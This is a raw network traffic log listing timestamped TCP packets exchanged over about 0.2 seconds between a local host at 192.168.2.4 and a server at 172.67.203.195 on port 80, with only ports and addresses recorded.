Sep 14, 2024 18:31:10.859936953 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.859947920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.859958887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.860014915 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.860249043 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.905724049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.905742884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.905754089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.905766010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.905776978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.905786991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.905798912 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.905872107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.905881882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.905893087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.905910969 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.905922890 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.905934095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.905945063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.905956030 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.906001091 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.906142950 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.906573057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.906584978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.906594992 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.906647921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.906658888 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.906697035 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.906702995 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.906708956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.906879902 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.908349991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.908360958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.908366919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.908410072 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.908421040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.908431053 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.908447981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.908458948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.908485889 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.908487082 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.908529997 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.908541918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.908552885 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.908562899 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.908572912 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.908601999 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.908636093 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.908648014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.908663034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.908673048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.908683062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.908710003 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.908745050 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.909260035 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.909363031 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.909373045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.909424067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.909434080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.909444094 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.909455061 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.909461975 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.909492970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.909502983 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.909540892 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.909651041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.909666061 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.909677029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.909744024 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.909792900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.909802914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.909837961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.909877062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.909883976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.909902096 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.909910917 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.909912109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.909910917 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.909928083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.909940958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.909940958 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.909970999 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.909986019 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.909996033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.910001040 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.910012960 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.910047054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.910053968 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.910058022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.910075903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.910099030 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.910125017 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.910211086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.910222054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.910232067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.910243034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.910254002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.910279989 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.910284042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.910295963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.910305977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.910316944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.910326958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.910351992 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.910384893 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.910392046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.910403967 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.910466909 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.910876036 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.910887003 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.910896063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.910944939 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.910999060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.911010027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.911020041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.911036015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.911055088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.911063910 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.911065102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.911077023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.911087036 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.911118031 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.911216974 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.911226988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.911237001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.911247969 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.911257982 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.911267996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.911277056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.911288977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.911288977 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.911315918 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.911345005 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.911345959 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.911427975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.911438942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.911479950 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.911506891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.911518097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.911528111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.911537886 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.911566019 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.911566973 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.911576986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.911587954 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.911588907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.911614895 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.911645889 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.920399904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.920432091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.920552015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.920562983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.920574903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.920605898 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.920620918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.920633078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.920644045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.920669079 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.920715094 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.946722031 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.946820974 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.946870089 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.946892023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.946903944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.946918964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.946928978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.946938992 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.946959019 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.947025061 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.992198944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.992260933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.992271900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.992288113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.992297888 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.992310047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.992312908 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.992321968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.992333889 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.992357969 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.992357969 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.992419958 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.992453098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.992463112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.992471933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.992481947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.992491961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.992501020 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.992511034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.992515087 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.992537975 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.992571115 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.993552923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.993602991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.993613005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.993659019 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.993697882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.993709087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.993719101 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.993727922 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.993737936 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.993802071 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.993802071 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.995522022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.995532036 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.995542049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.995590925 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.995641947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.995652914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.995661974 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.995671988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.995682001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.995691061 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.995704889 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.995714903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.995732069 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.995765924 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.995780945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.995790958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.995800018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.995810032 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.995819092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.995839119 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.995872974 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.996418953 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.996468067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.996478081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.996537924 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.996556997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.996567965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.996577978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.996588945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.996649981 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.996684074 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.996696949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.996707916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.996717930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.996727943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.996776104 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.996776104 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.996896029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.996907949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.996917963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.996925116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.996933937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.996948957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.996957064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.996963978 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.996968985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.996979952 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.996990919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.997000933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.997028112 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.997061968 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.997343063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.997351885 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.997355938 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.997365952 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.997380972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.997390985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.997400045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.997411013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.997451067 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.997478008 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.997481108 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.997488976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.997499943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.997510910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.997520924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.997534037 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.997562885 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.997581005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.997591972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.997641087 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.998140097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998172998 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998181105 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998207092 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.998249054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998260021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998266935 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.998270988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998281956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998291969 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998302937 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.998347998 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998359919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998368025 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998392105 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.998392105 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.998425961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998426914 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.998476028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998486996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998531103 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.998595953 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998605967 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998615980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998625040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998634100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998655081 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.998691082 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.998725891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998737097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998745918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998754978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998764992 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998775005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998784065 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.998788118 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998800039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998802900 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.998831034 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.998835087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998847008 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.998851061 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.998891115 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.007359028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.007375002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.007386923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.007472038 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.007471085 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.007482052 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.007493019 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.007503033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.007523060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.007531881 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.007564068 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.007597923 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.033668041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.033700943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.033710957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.033766985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.033778906 CEST	80	49738	172.67.203.195	192.168.2.4
